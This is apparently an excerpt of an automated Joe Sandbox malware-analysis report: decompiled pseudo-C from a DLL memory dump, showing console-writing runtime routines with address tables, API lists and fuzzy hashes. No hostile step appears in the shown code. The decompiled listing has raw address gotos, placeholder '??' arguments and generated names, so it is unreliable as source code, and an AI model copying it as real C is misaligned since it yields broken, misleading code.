                                                                                                        				 *((long long*)(_t336 - 0x29)) = _t269;
                                                                                                        				r12d = r9d;
                                                                                                        				_t365 = _t364 + __r8;
                                                                                                        				 *((long long*)(_t336 - 0x71)) = _t365;
                                                                                                        				 *((intOrPtr*)(_t336 - 0x61)) = GetConsoleOutputCP();
                                                                                                        				if ( *((intOrPtr*)(_t367 + 0x28)) != dil) goto 0x123e09f8;
                                                                                                        				0x123d9140();
                                                                                                        				_t294 =  *((intOrPtr*)(_t367 + 0x18));
                                                                                                        				r8d =  *(_t294 + 0xc);
                                                                                                        				 *(_t336 - 0x5d) = r8d;
                                                                                                        				 *((long long*)(__rcx)) = _t269;
                                                                                                        				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                                                        				if ( *((intOrPtr*)(_t336 - 0x49)) - _t365 >= 0) goto 0x123e0db8;
                                                                                                        				_t271 = __edx >> 6;
                                                                                                        				 *(_t336 - 0x21) = _t271;
                                                                                                        				 *((char*)(_t338 + 0x40)) =  *((intOrPtr*)(__r8));
                                                                                                        				 *((intOrPtr*)(_t336 - 0x7d)) = 0;
                                                                                                        				r12d = 1;
                                                                                                        				if (r8d != 0xfde9) goto 0x123e0bc0;
                                                                                                        				_t347 = 0x3e + _t375 * 8 +  *((intOrPtr*)(0x7ffc123d0000 + 0x7f940 + _t271 * 8));
                                                                                                        				if ( *_t347 == dil) goto 0x123e0a74;
                                                                                                        				_t372 = _t329 + 1;
                                                                                                        				if (_t372 - 5 < 0) goto 0x123e0a61;
                                                                                                        				if (_t372 == 0) goto 0x123e0b52;
                                                                                                        				r12d =  *((char*)(_t294 + 0x7ffc1244e8f0));
                                                                                                        				r12d = r12d + 1;
                                                                                                        				_t181 = r12d - 1;
                                                                                                        				 *((intOrPtr*)(_t336 - 0x69)) = _t181;
                                                                                                        				_t341 = _t181;
                                                                                                        				if (_t341 -  *((intOrPtr*)(_t336 - 0x71)) - __r8 > 0) goto 0x123e0d27;
                                                                                                        				_t295 = _t329;
                                                                                                        				 *((char*)(_t336 + _t295 - 1)) =  *_t347;
                                                                                                        				if (_t295 + 1 - _t372 < 0) goto 0x123e0ab9;
                                                                                                        				if (_t341 <= 0) goto 0x123e0aea;
                                                                                                        				E00007FFC7FFC123D64D0( *( *((intOrPtr*)(0x7ffc123d0000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + 0x3e + _t375 * 8) & 0x000000ff, 0, __esi, __esp, _t336 - 1 + _t372, __r8, _t329, __r8, _t341);
                                                                                                        				_t318 = _t329;
                                                                                                        				 *((intOrPtr*)( *((intOrPtr*)(0x7ffc123d0000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + _t318 + 0x3e + _t375 * 8)) = dil;
                                                                                                        				if (_t318 + 1 - _t372 < 0) goto 0x123e0aed;
                                                                                                        				 *((long long*)(_t336 - 0x41)) = _t329;
                                                                                                        				_t276 = _t336 - 1;
                                                                                                        				 *((long long*)(_t336 - 0x39)) = _t276;
                                                                                                        				_t186 = (0 | r12d == 0x00000004) + 1;
                                                                                                        				r12d = _t186;
                                                                                                        				r8d = _t186;
                                                                                                        				 *((long long*)(_t338 + 0x20)) = _t367;
                                                                                                        				E00007FFC7FFC123E1744(_t276, _t289, _t336 - 0x7d, _t336 - 0x39, _t341, _t336 - 0x41);
                                                                                                        				if (_t276 == 0xffffffff) goto 0x123e0db8;
                                                                                                        				_t331 = __r8 +  *((intOrPtr*)(_t336 - 0x69)) - 1;
                                                                                                        				goto 0x123e0c55;
                                                                                                        				_t368 =  *((char*)(_t276 + 0x7ffc1244e8f0));
                                                                                                        				_t212 = _t368 + 1;
                                                                                                        				_t343 =  *((intOrPtr*)(_t336 - 0x71)) - _t331;
                                                                                                        				if (_t212 - _t343 > 0) goto 0x123e0d55;
                                                                                                        				 *((long long*)(_t336 - 0x69)) = _t329;
                                                                                                        				 *((long long*)(_t336 - 0x31)) = _t331;
                                                                                                        				_t193 = (0 | _t212 == 0x00000004) + 1;
                                                                                                        				r14d = _t193;
                                                                                                        				r8d = _t193;
                                                                                                        				_t278 =  *((intOrPtr*)(_t336 - 0x51));
                                                                                                        				 *((long long*)(_t338 + 0x20)) = _t278;
                                                                                                        				E00007FFC7FFC123E1744(_t278, _t289, _t336 - 0x7d, _t336 - 0x31, _t343, _t336 - 0x69);
                                                                                                        				if (_t278 == 0xffffffff) goto 0x123e0db8;
                                                                                                        				_t332 = _t331 + _t368;
                                                                                                        				r12d = r14d;
                                                                                                        				goto 0x123e0c55;
                                                                                                        				_t359 =  *(_t336 - 0x59);
                                                                                                        				_t351 =  *((intOrPtr*)(0x7ffc123d0000 + 0x7f940 + _t359 * 8));
                                                                                                        				_t213 =  *(_t351 + 0x3d + _t375 * 8);
                                                                                                        				if ((_t213 & 0x00000004) == 0) goto 0x123e0bf7;
                                                                                                        				 *((char*)(_t336 + 7)) =  *((intOrPtr*)(_t351 + 0x3e + _t375 * 8));
                                                                                                        				 *((char*)(_t336 + 8)) =  *_t332;
                                                                                                        				 *(_t351 + 0x3d + _t375 * 8) = _t213 & 0x000000fb;
                                                                                                        				r8d = 2;
                                                                                                        				goto 0x123e0c40;
                                                                                                        				r8d =  *_t332 & 0x000000ff;
                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t336 - 0x51)) + 0x18)))) + _t343 * 2)) >= 0) goto 0x123e0c3a;
                                                                                                        				_t373 =  &(_t332[1]);
                                                                                                        				if (_t373 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0x123e0d93;
                                                                                                        				r8d = 2;
                                                                                                        				if (E00007FFC7FFC123DE960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t332, _t329, _t332, _t336, _t343,  *((intOrPtr*)(_t336 - 0x51))) == 0xffffffff) goto 0x123e0db8;
                                                                                                        				_t333 = _t373;
                                                                                                        				goto 0x123e0c55;
                                                                                                        				_t198 = E00007FFC7FFC123DE960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t333, _t329, _t333, _t336, _t365,  *((intOrPtr*)(_t336 - 0x51)));
                                                                                                        				if (_t198 == 0xffffffff) goto 0x123e0db8;
                                                                                                        				_t334 =  &(_t333[1]);
                                                                                                        				 *((long long*)(_t338 + 0x38)) = _t329;
                                                                                                        				 *((long long*)(_t338 + 0x30)) = _t329;
                                                                                                        				 *((intOrPtr*)(_t338 + 0x28)) = 5;
                                                                                                        				_t280 = _t336 + 0xf;
                                                                                                        				 *((long long*)(_t338 + 0x20)) = _t280;
                                                                                                        				r9d = r12d;
                                                                                                        				_t345 = _t336 - 0x7d;
                                                                                                        				E00007FFC7FFC123DD698();
                                                                                                        				r14d = _t198;
                                                                                                        				if (_t198 == 0) goto 0x123e0db8;
                                                                                                        				 *((long long*)(_t338 + 0x20)) = _t329;
                                                                                                        				r8d = _t198;
                                                                                                        				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x123e0db0;
                                                                                                        				 *((intOrPtr*)(_t289 + 4)) = __esi -  *((intOrPtr*)(_t336 - 0x49)) +  *((intOrPtr*)(_t289 + 8));
                                                                                                        				if ( *((intOrPtr*)(_t336 - 0x79)) - r14d < 0) goto 0x123e0db8;
                                                                                                        				if ( *((char*)(_t338 + 0x40)) != 0xa) goto 0x123e0d10;
                                                                                                        				 *((short*)(_t338 + 0x40)) = 0xd;
                                                                                                        				 *((long long*)(_t338 + 0x20)) = _t329;
                                                                                                        				_t128 = _t280 - 0xc; // 0x1
                                                                                                        				r8d = _t128;
                                                                                                        				_t326 = _t338 + 0x40;
                                                                                                        				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x123e0db0;
                                                                                                        				if ( *((intOrPtr*)(_t336 - 0x79)) - 1 < 0) goto 0x123e0db8;
                                                                                                        				 *((intOrPtr*)(_t289 + 8)) =  *((intOrPtr*)(_t289 + 8)) + 1;
                                                                                                        				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + 1;
                                                                                                        				if (_t334 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0x123e0db8;
                                                                                                        				r8d =  *(_t336 - 0x5d);
                                                                                                        				goto 0x123e0a23;
                                                                                                        				if (_t326 <= 0) goto 0x123e0d50;
                                                                                                        				_t335 = _t334 - _t373;
                                                                                                        				 *((char*)( *((intOrPtr*)(0x7ffc123d0000 + 0x7f940 + _t359 * 8)) + _t373 + 0x3e + _t375 * 8)) =  *((intOrPtr*)(_t335 + _t373));
                                                                                                        				if (1 - _t326 < 0) goto 0x123e0d2f;
                                                                                                        				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) +  *((intOrPtr*)(_t289 + 4));
                                                                                                        				goto 0x123e0db8;
                                                                                                        				if (_t345 <= 0) goto 0x123e0d8d;
                                                                                                        				_t327 = _t329;
                                                                                                        				_t361 =  *(_t336 - 0x19) >> 6;
                                                                                                        				_t356 =  *(_t336 - 0x11) +  *(_t336 - 0x11) * 8;
                                                                                                        				 *((char*)( *((intOrPtr*)(0x7ffc123d0000 + 0x7f940 + _t361 * 8)) + _t356 * 8 + _t327 + 0x3e)) =  *((intOrPtr*)(_t327 + _t335));
                                                                                                        				_t328 = _t327 + 1;
                                                                                                        				if (2 - _t345 < 0) goto 0x123e0d6d;
                                                                                                        				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + r8d;
                                                                                                        				goto 0x123e0db8;
                                                                                                        				 *((char*)(_t356 + 0x3e + _t375 * 8)) =  *_t335;
                                                                                                        				 *( *((intOrPtr*)(0x7ffc123d0000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) =  *( *((intOrPtr*)(0x7ffc123d0000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) | 0x00000004;
                                                                                                        				_t174 = _t328 + 1; // 0x1
                                                                                                        				 *((intOrPtr*)(_t289 + 4)) = _t174;
                                                                                                        				goto 0x123e0db8;
                                                                                                        				 *_t289 = GetLastError();
                                                                                                        				return E00007FFC7FFC123D3A70(_t206,  *((intOrPtr*)(_t336 - 0x61)),  *((intOrPtr*)(_t289 + 4)),  *(_t336 + 0x17) ^ _t338);
                                                                                                        			}



















































                                                                                                        0x7ffc123e0958
                                                                                                        0x7ffc123e0966
                                                                                                        0x7ffc123e096a
                                                                                                        0x7ffc123e0971
                                                                                                        0x7ffc123e0979
                                                                                                        0x7ffc123e097d
                                                                                                        0x7ffc123e0987
                                                                                                        0x7ffc123e098e
                                                                                                        0x7ffc123e0995
                                                                                                        0x7ffc123e0998
                                                                                                        0x7ffc123e099c
                                                                                                        0x7ffc123e09a3
                                                                                                        0x7ffc123e09aa
                                                                                                        0x7ffc123e09ae
                                                                                                        0x7ffc123e09bc
                                                                                                        0x7ffc123e09c0
                                                                                                        0x7ffc123e09cc
                                                                                                        0x7ffc123e09d1
                                                                                                        0x7ffc123e09d5
                                                                                                        0x7ffc123e09d8
                                                                                                        0x7ffc123e09db
                                                                                                        0x7ffc123e09e5
                                                                                                        0x7ffc123e09ee
                                                                                                        0x7ffc123e09f3
                                                                                                        0x7ffc123e09f8
                                                                                                        0x7ffc123e09fc
                                                                                                        0x7ffc123e0a00
                                                                                                        0x7ffc123e0a06
                                                                                                        0x7ffc123e0a09
                                                                                                        0x7ffc123e0a10
                                                                                                        0x7ffc123e0a19
                                                                                                        0x7ffc123e0a1d
                                                                                                        0x7ffc123e0a25
                                                                                                        0x7ffc123e0a29
                                                                                                        0x7ffc123e0a2c
                                                                                                        0x7ffc123e0a40
                                                                                                        0x7ffc123e0a5b
                                                                                                        0x7ffc123e0a64
                                                                                                        0x7ffc123e0a68
                                                                                                        0x7ffc123e0a72
                                                                                                        0x7ffc123e0a77
                                                                                                        0x7ffc123e0a8f
                                                                                                        0x7ffc123e0a98
                                                                                                        0x7ffc123e0a9e
                                                                                                        0x7ffc123e0aa0
                                                                                                        0x7ffc123e0aaa
                                                                                                        0x7ffc123e0ab0
                                                                                                        0x7ffc123e0ab6
                                                                                                        0x7ffc123e0abc
                                                                                                        0x7ffc123e0ac9
                                                                                                        0x7ffc123e0ace
                                                                                                        0x7ffc123e0ada
                                                                                                        0x7ffc123e0aea
                                                                                                        0x7ffc123e0af8
                                                                                                        0x7ffc123e0b03
                                                                                                        0x7ffc123e0b05
                                                                                                        0x7ffc123e0b09
                                                                                                        0x7ffc123e0b0d
                                                                                                        0x7ffc123e0b1a
                                                                                                        0x7ffc123e0b1c
                                                                                                        0x7ffc123e0b1f
                                                                                                        0x7ffc123e0b22
                                                                                                        0x7ffc123e0b33
                                                                                                        0x7ffc123e0b3c
                                                                                                        0x7ffc123e0b4a
                                                                                                        0x7ffc123e0b4d
                                                                                                        0x7ffc123e0b55
                                                                                                        0x7ffc123e0b5e
                                                                                                        0x7ffc123e0b66
                                                                                                        0x7ffc123e0b6f
                                                                                                        0x7ffc123e0b75
                                                                                                        0x7ffc123e0b79
                                                                                                        0x7ffc123e0b85
                                                                                                        0x7ffc123e0b87
                                                                                                        0x7ffc123e0b8a
                                                                                                        0x7ffc123e0b8d
                                                                                                        0x7ffc123e0b91
                                                                                                        0x7ffc123e0ba2
                                                                                                        0x7ffc123e0bab
                                                                                                        0x7ffc123e0bb1
                                                                                                        0x7ffc123e0bb4
                                                                                                        0x7ffc123e0bbb
                                                                                                        0x7ffc123e0bc0
                                                                                                        0x7ffc123e0bc4
                                                                                                        0x7ffc123e0bcc
                                                                                                        0x7ffc123e0bd4
                                                                                                        0x7ffc123e0bdb
                                                                                                        0x7ffc123e0be0
                                                                                                        0x7ffc123e0be6
                                                                                                        0x7ffc123e0beb
                                                                                                        0x7ffc123e0bf5
                                                                                                        0x7ffc123e0bf7
                                                                                                        0x7ffc123e0c07
                                                                                                        0x7ffc123e0c09
                                                                                                        0x7ffc123e0c11
                                                                                                        0x7ffc123e0c1a
                                                                                                        0x7ffc123e0c2f
                                                                                                        0x7ffc123e0c35
                                                                                                        0x7ffc123e0c38
                                                                                                        0x7ffc123e0c47
                                                                                                        0x7ffc123e0c4f
                                                                                                        0x7ffc123e0c55
                                                                                                        0x7ffc123e0c58
                                                                                                        0x7ffc123e0c5d
                                                                                                        0x7ffc123e0c62
                                                                                                        0x7ffc123e0c6a
                                                                                                        0x7ffc123e0c6e
                                                                                                        0x7ffc123e0c73
                                                                                                        0x7ffc123e0c76
                                                                                                        0x7ffc123e0c7f
                                                                                                        0x7ffc123e0c84
                                                                                                        0x7ffc123e0c89
                                                                                                        0x7ffc123e0c8f
                                                                                                        0x7ffc123e0c98
                                                                                                        0x7ffc123e0cae
                                                                                                        0x7ffc123e0cbc
                                                                                                        0x7ffc123e0cc3
                                                                                                        0x7ffc123e0cce
                                                                                                        0x7ffc123e0cd5
                                                                                                        0x7ffc123e0cda
                                                                                                        0x7ffc123e0ce3
                                                                                                        0x7ffc123e0ce3
                                                                                                        0x7ffc123e0ce7
                                                                                                        0x7ffc123e0cf7
                                                                                                        0x7ffc123e0d01
                                                                                                        0x7ffc123e0d07
                                                                                                        0x7ffc123e0d0a
                                                                                                        0x7ffc123e0d14
                                                                                                        0x7ffc123e0d1e
                                                                                                        0x7ffc123e0d22
                                                                                                        0x7ffc123e0d2a
                                                                                                        0x7ffc123e0d2c
                                                                                                        0x7ffc123e0d3e
                                                                                                        0x7ffc123e0d4e
                                                                                                        0x7ffc123e0d50
                                                                                                        0x7ffc123e0d53
                                                                                                        0x7ffc123e0d58
                                                                                                        0x7ffc123e0d5a
                                                                                                        0x7ffc123e0d61
                                                                                                        0x7ffc123e0d69
                                                                                                        0x7ffc123e0d7c
                                                                                                        0x7ffc123e0d82
                                                                                                        0x7ffc123e0d8b
                                                                                                        0x7ffc123e0d8d
                                                                                                        0x7ffc123e0d91
                                                                                                        0x7ffc123e0d95
                                                                                                        0x7ffc123e0da2
                                                                                                        0x7ffc123e0da8
                                                                                                        0x7ffc123e0dab
                                                                                                        0x7ffc123e0dae
                                                                                                        0x7ffc123e0db6
                                                                                                        0x7ffc123e0de1

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                        • String ID:
                                                                                                        • API String ID: 2718003287-0
                                                                                                        • Opcode ID: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
                                                                                                        • Instruction ID: 9371a17db41541b0c0ac3b8792bc0bbafb3e3f20ea73669f92b6b45d34deb883
                                                                                                        • Opcode Fuzzy Hash: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
                                                                                                        • Instruction Fuzzy Hash: F3D11536B08A9989E710CF78D4402ED77B5FB847A8B904272CF4D67B99CE78D42AC710
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 29%
                                                                                                        			E00007FFC7FFC123E129C(void* __ebx, signed int __ecx, void* __ebp, void* __esp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
                                                                                                        				signed short _v80;
                                                                                                        				void* _v92;
                                                                                                        				signed int _v96;
                                                                                                        				intOrPtr _v104;
                                                                                                        				intOrPtr _v108;
                                                                                                        				long _v112;
                                                                                                        				signed int _v120;
                                                                                                        				long long _v128;
                                                                                                        				signed int _v136;
                                                                                                        				void* __rbx;
                                                                                                        				void* __rsi;
                                                                                                        				void* __rbp;
                                                                                                        				void* _t107;
                                                                                                        				long _t116;
                                                                                                        				signed int _t117;
                                                                                                        				void* _t122;
                                                                                                        				signed int _t128;
                                                                                                        				intOrPtr _t146;
                                                                                                        				intOrPtr _t147;
                                                                                                        				void* _t169;
                                                                                                        				signed long long _t182;
                                                                                                        				signed long long _t186;
                                                                                                        				signed long long _t189;
                                                                                                        				signed long long _t208;
                                                                                                        				signed int _t209;
                                                                                                        				void* _t210;
                                                                                                        				void* _t212;
                                                                                                        				void* _t228;
                                                                                                        				signed long long _t229;
                                                                                                        				signed short* _t230;
                                                                                                        				void* _t231;
                                                                                                        				signed short* _t232;
                                                                                                        
                                                                                                        				_t122 = __ebx;
                                                                                                        				r15d = r8d;
                                                                                                        				_t186 = __r9;
                                                                                                        				_t230 = __rdx;
                                                                                                        				if (r8d == 0) goto 0x123e1599;
                                                                                                        				if (__rdx != 0) goto 0x123e1303;
                                                                                                        				 *((char*)(__r9 + 0x38)) = 1;
                                                                                                        				r8d = 0;
                                                                                                        				 *((intOrPtr*)(__r9 + 0x34)) = 0;
                                                                                                        				 *((char*)(__r9 + 0x30)) = 1;
                                                                                                        				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
                                                                                                        				r9d = 0;
                                                                                                        				_v128 = __r9;
                                                                                                        				_v136 = _t209;
                                                                                                        				E00007FFC7FFC123D9674(__rax, __r9, __rcx, __rdx, _t210, _t212, __r8);
                                                                                                        				goto 0x123e159b;
                                                                                                        				_t189 = __ecx >> 6;
                                                                                                        				_v120 = _t189;
                                                                                                        				_t229 = __ecx + __ecx * 8;
                                                                                                        				if (_t210 - 1 - 1 > 0) goto 0x123e1339;
                                                                                                        				if (( !r15d & 0x00000001) == 0) goto 0x123e12cc;
                                                                                                        				if (( *( *((intOrPtr*)(0x1244f940 + _t189 * 8)) + 0x38 + _t229 * 8) & 0x00000020) == 0) goto 0x123e134f;
                                                                                                        				r8d = 0x7ffc1244f942;
                                                                                                        				E00007FFC7FFC123E1E38(r12d);
                                                                                                        				_v96 = _t209;
                                                                                                        				if (E00007FFC7FFC123E16A0(r12d, __ecx) == 0) goto 0x123e1485;
                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)(0x1244f940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0x123e1485;
                                                                                                        				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x123e1396;
                                                                                                        				0x123d9140();
                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t209) goto 0x123e13b2;
                                                                                                        				_t182 =  *((intOrPtr*)(0x1244f940 + _v120 * 8));
                                                                                                        				if ( *((intOrPtr*)(_t182 + 0x39 + _t229 * 8)) == dil) goto 0x123e1485;
                                                                                                        				if (GetConsoleMode(??, ??) == 0) goto 0x123e147a;
                                                                                                        				if (sil == 0) goto 0x123e1457;
                                                                                                        				sil = sil - 1;
                                                                                                        				if (sil - 1 > 0) goto 0x123e151e;
                                                                                                        				_t228 = _t230 + _t231;
                                                                                                        				_v112 = _t209;
                                                                                                        				_t232 = _t230;
                                                                                                        				if (_t230 - _t228 >= 0) goto 0x123e1514;
                                                                                                        				_v80 =  *_t232 & 0x0000ffff;
                                                                                                        				_t107 = E00007FFC7FFC123E1E40( *_t232 & 0xffff);
                                                                                                        				_t128 = _v80 & 0x0000ffff;
                                                                                                        				if (_t107 != _t128) goto 0x123e1449;
                                                                                                        				_t146 = _v108 + 2;
                                                                                                        				_v108 = _t146;
                                                                                                        				if (_t128 != 0xa) goto 0x123e143a;
                                                                                                        				if (E00007FFC7FFC123E1E40(0xd) != 0xd) goto 0x123e1449;
                                                                                                        				_t147 = _t146 + 1;
                                                                                                        				_v108 = _t147;
                                                                                                        				if ( &(_t232[1]) - _t228 >= 0) goto 0x123e1514;
                                                                                                        				goto 0x123e13fa;
                                                                                                        				_v112 = GetLastError();
                                                                                                        				goto 0x123e1514;
                                                                                                        				r9d = r15d;
                                                                                                        				_v136 = __r9;
                                                                                                        				E00007FFC7FFC123E0958(0xd, r12d, _t147, __ebp, __esp, __r9,  &_v112, _t230);
                                                                                                        				asm("movsd xmm0, [eax]");
                                                                                                        				goto 0x123e1519;
                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)(0x1244f940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0x123e14e1;
                                                                                                        				_t169 = sil;
                                                                                                        				if (_t169 == 0) goto 0x123e14cd;
                                                                                                        				if (_t169 == 0) goto 0x123e14b9;
                                                                                                        				if (_t147 - 1 != 1) goto 0x123e1529;
                                                                                                        				r9d = r15d;
                                                                                                        				E00007FFC7FFC123E0EE8(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
                                                                                                        				goto 0x123e146e;
                                                                                                        				r9d = r15d;
                                                                                                        				E00007FFC7FFC123E1004(r12d,  *((intOrPtr*)(_t182 + 8)), _t182, _t186,  &_v112, _t212, _t230);
                                                                                                        				goto 0x123e146e;
                                                                                                        				r9d = r15d;
                                                                                                        				E00007FFC7FFC123E0DE4(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
                                                                                                        				goto 0x123e146e;
                                                                                                        				r8d = r15d;
                                                                                                        				_v136 = _v136 & _t182;
                                                                                                        				_v112 = _t182;
                                                                                                        				_v104 = 0;
                                                                                                        				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x123e1511;
                                                                                                        				_t116 = GetLastError();
                                                                                                        				_v112 = _t116;
                                                                                                        				asm("movsd xmm0, [ebp-0x30]");
                                                                                                        				asm("movsd [ebp-0x20], xmm0");
                                                                                                        				if (_t116 != 0) goto 0x123e1592;
                                                                                                        				_t117 = _v96;
                                                                                                        				if (_t117 == 0) goto 0x123e1568;
                                                                                                        				if (_t117 != 5) goto 0x123e1558;
                                                                                                        				 *((char*)(_t186 + 0x30)) = 1;
                                                                                                        				 *((intOrPtr*)(_t186 + 0x2c)) = 9;
                                                                                                        				 *((char*)(_t186 + 0x38)) = 1;
                                                                                                        				 *(_t186 + 0x34) = _t117;
                                                                                                        				goto 0x123e12fb;
                                                                                                        				_t208 = _t186;
                                                                                                        				E00007FFC7FFC123DB3DC(_v96, _t208);
                                                                                                        				goto 0x123e12fb;
                                                                                                        				if (( *( *((intOrPtr*)(0x1244f940 + _t208 * 8)) + 0x38 + _t229 * 8) & 0x00000040) == 0) goto 0x123e157a;
                                                                                                        				if ( *_t230 == 0x1a) goto 0x123e1599;
                                                                                                        				 *(_t186 + 0x34) =  *(_t186 + 0x34) & 0x00000000;
                                                                                                        				 *((char*)(_t186 + 0x30)) = 1;
                                                                                                        				 *((intOrPtr*)(_t186 + 0x2c)) = 0x1c;
                                                                                                        				 *((char*)(_t186 + 0x38)) = 1;
                                                                                                        				goto 0x123e12fb;
                                                                                                        				goto 0x123e159b;
                                                                                                        				return 0;
                                                                                                        			}



































                                                                                                        0x7ffc123e129c
                                                                                                        0x7ffc123e12b2
                                                                                                        0x7ffc123e12b8
                                                                                                        0x7ffc123e12bb
                                                                                                        0x7ffc123e12c1
                                                                                                        0x7ffc123e12ca
                                                                                                        0x7ffc123e12cc
                                                                                                        0x7ffc123e12d1
                                                                                                        0x7ffc123e12d4
                                                                                                        0x7ffc123e12da
                                                                                                        0x7ffc123e12e1
                                                                                                        0x7ffc123e12e9
                                                                                                        0x7ffc123e12ec
                                                                                                        0x7ffc123e12f1
                                                                                                        0x7ffc123e12f6
                                                                                                        0x7ffc123e12fe
                                                                                                        0x7ffc123e1313
                                                                                                        0x7ffc123e1317
                                                                                                        0x7ffc123e131b
                                                                                                        0x7ffc123e132e
                                                                                                        0x7ffc123e1337
                                                                                                        0x7ffc123e133f
                                                                                                        0x7ffc123e1346
                                                                                                        0x7ffc123e134a
                                                                                                        0x7ffc123e1352
                                                                                                        0x7ffc123e1368
                                                                                                        0x7ffc123e1377
                                                                                                        0x7ffc123e1381
                                                                                                        0x7ffc123e1386
                                                                                                        0x7ffc123e13a1
                                                                                                        0x7ffc123e13a3
                                                                                                        0x7ffc123e13ac
                                                                                                        0x7ffc123e13c7
                                                                                                        0x7ffc123e13d0
                                                                                                        0x7ffc123e13d6
                                                                                                        0x7ffc123e13dd
                                                                                                        0x7ffc123e13e3
                                                                                                        0x7ffc123e13e7
                                                                                                        0x7ffc123e13eb
                                                                                                        0x7ffc123e13f1
                                                                                                        0x7ffc123e1401
                                                                                                        0x7ffc123e1405
                                                                                                        0x7ffc123e140a
                                                                                                        0x7ffc123e1411
                                                                                                        0x7ffc123e1413
                                                                                                        0x7ffc123e1416
                                                                                                        0x7ffc123e141d
                                                                                                        0x7ffc123e1431
                                                                                                        0x7ffc123e1433
                                                                                                        0x7ffc123e1435
                                                                                                        0x7ffc123e1441
                                                                                                        0x7ffc123e1447
                                                                                                        0x7ffc123e144f
                                                                                                        0x7ffc123e1452
                                                                                                        0x7ffc123e1457
                                                                                                        0x7ffc123e145a
                                                                                                        0x7ffc123e1469
                                                                                                        0x7ffc123e146e
                                                                                                        0x7ffc123e1475
                                                                                                        0x7ffc123e148e
                                                                                                        0x7ffc123e1492
                                                                                                        0x7ffc123e1495
                                                                                                        0x7ffc123e149a
                                                                                                        0x7ffc123e149f
                                                                                                        0x7ffc123e14a5
                                                                                                        0x7ffc123e14b2
                                                                                                        0x7ffc123e14b7
                                                                                                        0x7ffc123e14b9
                                                                                                        0x7ffc123e14c6
                                                                                                        0x7ffc123e14cb
                                                                                                        0x7ffc123e14cd
                                                                                                        0x7ffc123e14da
                                                                                                        0x7ffc123e14df
                                                                                                        0x7ffc123e14ec
                                                                                                        0x7ffc123e14ef
                                                                                                        0x7ffc123e14f7
                                                                                                        0x7ffc123e14fb
                                                                                                        0x7ffc123e1506
                                                                                                        0x7ffc123e1508
                                                                                                        0x7ffc123e150e
                                                                                                        0x7ffc123e1514
                                                                                                        0x7ffc123e1519
                                                                                                        0x7ffc123e1533
                                                                                                        0x7ffc123e1535
                                                                                                        0x7ffc123e153a
                                                                                                        0x7ffc123e153f
                                                                                                        0x7ffc123e1541
                                                                                                        0x7ffc123e1545
                                                                                                        0x7ffc123e154c
                                                                                                        0x7ffc123e1550
                                                                                                        0x7ffc123e1553
                                                                                                        0x7ffc123e155b
                                                                                                        0x7ffc123e155e
                                                                                                        0x7ffc123e1563
                                                                                                        0x7ffc123e1572
                                                                                                        0x7ffc123e1578
                                                                                                        0x7ffc123e157a
                                                                                                        0x7ffc123e157e
                                                                                                        0x7ffc123e1582
                                                                                                        0x7ffc123e1589
                                                                                                        0x7ffc123e158d
                                                                                                        0x7ffc123e1597
                                                                                                        0x7ffc123e15ab

                                                                                                        APIs
                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFC123E123C), ref: 00007FFC123E13BF
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFC123E123C), ref: 00007FFC123E1449
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
